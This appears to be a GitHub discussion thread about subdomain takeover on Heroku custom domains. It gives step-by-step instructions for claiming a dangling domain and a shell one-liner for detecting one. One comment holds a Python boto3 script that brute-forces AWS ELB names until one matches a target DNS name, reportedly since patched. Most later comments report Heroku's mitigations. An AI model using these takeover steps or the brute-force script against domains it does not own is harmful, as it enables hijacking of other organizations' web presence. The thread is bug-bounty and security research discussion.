Heroku proofs

[PatrikHudak]

Service name

Heroku

Proof

Heroku has same virtual hosting concept as other cloud providers. Various *.herokudns.com subdomain respond with the same set of A records. HTTP Host matters for correct domain resolution (as in other providers). There is also an possibility to upload own certificate in order to work on custom domain as well (e.g. GitHub Pages doesn't support this and thus you cannot have HTTPS enabled with custom domain set).

Step-by-step:

1. Open new Heroku app.
2. Choose name and region (no effect on takeover).
3. Push PoC application using git to Heroku. The process is described in Deploy tab.
4. Switch to Settings tab.
5. Scroll to Domains and certificates.
6. Click Add domain.
7. Provide the domain name you want to takeover, click Save changes.
8. It might take some time for settings to propagate.

To verify:

http -b GET http://{DOMAIN NAME} | grep -F -q "//www.herokucdn.com/error-pages/no-such-app.html" && echo "Subdomain takeover may be possible" || echo "Subdomain takeover is not possible"

(there is an iFrame with aforementioned URL present)

Documentation

There are three domains that Heroku uses:

• *.herokudns.com
• *.herokuapp.com
• *.herokussl.com

At the moment, I can confirm only proper working on herokudns.com. IIRC, herokuapp.com is a domain that was used prior and is now deprecated, however old DNS records still work. I would like to hear more in comments from somebody who has experience with the remaining two.

[PatrikHudak]

Official Heroku docs: https://devcenter.heroku.com/articles/custom-domains

[mshassy]

Can someone clarify with *.herokudns.com right now? When I add a custom domain the DNS record is fully randomized. Something like larval-beet.y987yas98yd98ya9yhd.herokudns.com It used to be www.domain.com.herokudns.com like 2 days ago @PatrikHudak @EdOverflow

[dropocol]

@mshassy it is randomized now. Just confirmed it.

[mshassy]

@dropocol Thanks a lot for the clarification. I was soo lucky to do a takeover two days. Just found another one and BAM! they have put mitigations. Good move by Heroku anyway.

[dropocol]

@mshassy Correct me if I am wrong but this means that the domain takeovers aren't possible any more?

[mshassy]

@dropocol Technically you still can. If the domain admin decides to use .herokuapp.com which is not randomized yet. But both .herokudns.com and *.herokussl.com are not vulnerable.

[codingo]

@mshassy What's the extent of this randomisation? These can often be defeated with a python script if the randomisation is somewhat predictable / basic (Amazon ELB's being a good example of this).

[mshassy]

@codingo oncave-bastion-olhqn7oqox74kixnwxpsyxkv.herokudns.com introductory-chimpanzee-vpgvjaxri1ntnuoda6f03jqy.herokudns.com fundamental-meerkat-dzdijagwzkou8z2ansfnmpsk.herokudns.com

3 back to back instances where I tried to add the same domain. Now it's fully randomized as you can see. I'm not sure whether it's possible to brute force such.

But it's strange that there is no info in their documentation about such change. https://devcenter.heroku.com/articles/custom-domains https://help.heroku.com/VKRNVVF5/what-is-the-correct-dns-cname-target-for-my-custom-domains

Btw this is off topic but I would be glad if you could tell us more about the ELB brute forcing. Does it mean that ELB takeovers are possible? I'm not too sure about this statement.

[staaldraad]

The change was activated on the 16th of October and recorded in the Heroku changelog: https://devcenter.heroku.com/changelog-items/1488

The devcenter documentation has not been updated yet, but should be before too long.

[bluedangerforyou]

If the company uses wild card ".domain.com then you cannot take it over because they "claim" all subdomains

[sagi]

@codingo can you please elaborate more about Amazon's ELB's cnames are appended a somewhat predictable integer? My trials with AWS's Load Balancer API seem to indicate uniformly distributed values.

[codingo]

@sagi these now look to be patched but for a period of time you could brute force them. Example PoC from when it was working below:

import boto3
import argparse
import time
client = boto3.client('elb', 'eu-central-1')

def takeover(elb,dns,flag):
    while (flag):
        time.sleep(2)
        response = client.create_load_balancer(
            Listeners=[
            {
                'InstancePort': 80,
                'InstanceProtocol': 'HTTP',
                'LoadBalancerPort': 80,
                'Protocol': 'HTTP',
            },
            ],
            LoadBalancerName=elb,
            SecurityGroups=[
               'sg-ead50686',
            ],
            Subnets=[
               'subnet-e7a9559c',
            ],
            )

        print(response['DNSName'])
        if response['DNSName'] == dns :
            flag=0
            print "DOMAIN TAKEN OVER"
            exit (0)
        else:
            response = client.delete_load_balancer(
                 LoadBalancerName=elb
               )

def main():
    parser = argparse.ArgumentParser(description='This script is for taking over ELB-SUBDOMAINS specifically eu-central-1')
    parser.add_argument('-elb', '--load_balancer', required=True)
    parser.add_argument('-dns', '--domain_name', required=True)
    args = parser.parse_args()
    takeover(args.load_balancer, args.domain_name,1)

if __name__ == '__main__':
    main()

Happy to elaborate further if you DM me on twitter.

[sagi]

@codingo Thanks!

[itachi73]

Do you have any idea how to takeover subdomain with the following records Status : NXDOMAIN CNAME : something.herokussl.com ?

[m7mdharoun]

More Prove about Edge case you can find it on my blog https://www.mohamedharon.com/2019/04/herokudns-still-vulnerable.html

[Vaghasiyayash]

CC is required to added customer domain :/

[ali0818]

Herokudns is not vulnerable anymore, the mentioned edge cases are also not working.

[dipeshdk]

@rootkech can you please elaborate a little why it is not vulnerable any more? Also, have you checked all the heroku domains? herokuapp.com, herokudns.com and herokussl.com

[adityathebe]

@rootkech can you please elaborate a little why it is not vulnerable any more? Also, have you checked all the heroku domains? herokuapp.com, herokudns.com and herokussl.com

You don't have the option to choose custom subdomains anymore with herokudns.com

[Anon-Exploiter]

Adding to the post^, this only works with domains and not subdomains.

-Open to corrections.

[Oumeir]

Heroku is not vulnerable any more :(

https://devcenter.heroku.com/articles/error-codes#h31-misdirected-request

H31 - Misdirected Request The client sent a request to the wrong endpoint. This could be because the client used stale DNS information or is accessing the app through a CDN that has stale DNS information. Verify that DNS is correctly configured for your app. If a CDN is configured for the app, consider contacting your CDN provider.

[teslatheg0d]

Heroku is not vulnerable

Edge Case Only

[itsbriany]

It looks like *.herokuapp.com is not vulnerable anymore.

The scenario:

dig -t CNAME x.vulnerable.com

[...]

;; ANSWER SECTION:
x.vulnerable.com. 142 IN  CNAME   x.vulnerable.herokuapp.com.

I took over x.vulnerable.herokuapp.com. However, when navigating to x.vulnerable.com, the HTTP Host header would be set to x.vulnerable.com. Heroku would then route to request to the Application Error page. However, when sending the request with the HTTP Host header set to x.vulnerable.herokuapp.com, Heroku successfully re-routed the request to my app. Both requests were sent to x.vulnerable.com.

For this case, I believe you need to have the root domain certificate associated with *.vulnerableapp.com to make Heroku successfully route the request which the attacker would not have access to.

You can read more here in the Heroku documentation.

[abusabiha]

What is the solution next? Plz help me.

The subdomain is under herokuspace.com

[bunny0417]

https://medium.com/@neverl0gbughunt/how-i-found-subdomain-takeover-on-red-bull-57540158a18

[waelahmed-dev]

Is it still vulnerable after this update?

[zy9ard3]

It seems Heroku turns out Non Vulnerable for takeovers anymore

• Reference : https://devcenter.heroku.com/changelog-items/2640

[amaan712345]

Can anyone clear this herokudns.com is still vulnerable for subdomain takeover

[649abhinav]

If vuln site pointing to cname eg: something-novalid.herokuapp.com and we trying to takeover appName "something-novalid" it not possible bcoz i guess It add "something-novalid-12312ewdw.herokuapp.com" as identifier according to https://devcenter.heroku.com/changelog-items/2640. which will not match something-novalid.herokuapp.com any how to perform redirect from vuln site www.example.com